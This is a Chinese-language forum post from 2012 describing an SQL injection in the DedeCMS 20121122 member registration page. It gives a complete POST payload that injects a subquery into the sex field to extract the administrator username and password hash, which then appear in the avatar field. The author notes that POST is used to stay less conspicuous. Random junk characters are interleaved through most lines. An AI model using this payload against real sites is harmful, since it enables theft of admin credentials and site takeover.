dedecms版本 20121122
, ^9 Z& a; { J/ r/ l
* x0 h/ l" v" Q需要magic_quotes_gpc=Off/ N5 K! g9 a" T9 a( {! ^
0 g2 {: J: E! K+ h( U应该是没有什么大危害的漏洞.7 R' C( ]$ B( I8 d
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
S6 ~. |2 O1 ~# R
* ]1 u$ ` V! b( R" J% K6 l是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
, `8 t* C! k8 X2 UPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
3 R5 P# D' M J( X; d5 X1 z- ]1 |; D3 d* F
http:///de/member/reg_new.php
- n, [* ?: ]2 d2 R6 f- z+ t0 a. Y' s* s) [
POST4 h( E" H9 Q3 M6 f( u* a
0 K. U: K- v) c0 v
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=$ o# I9 j- I, b2 C! {0 {+ z- l2 E
- R$ Q; L' n' t. f/ ~/ ]* c
成功注册后,头像处里面有好玩的信息.2 V3 J& k( g7 Q, }4 j! l& Z
- |2 q: A9 H# l
|
发表于 2012-12-5 10:03:32
收藏
支持
反对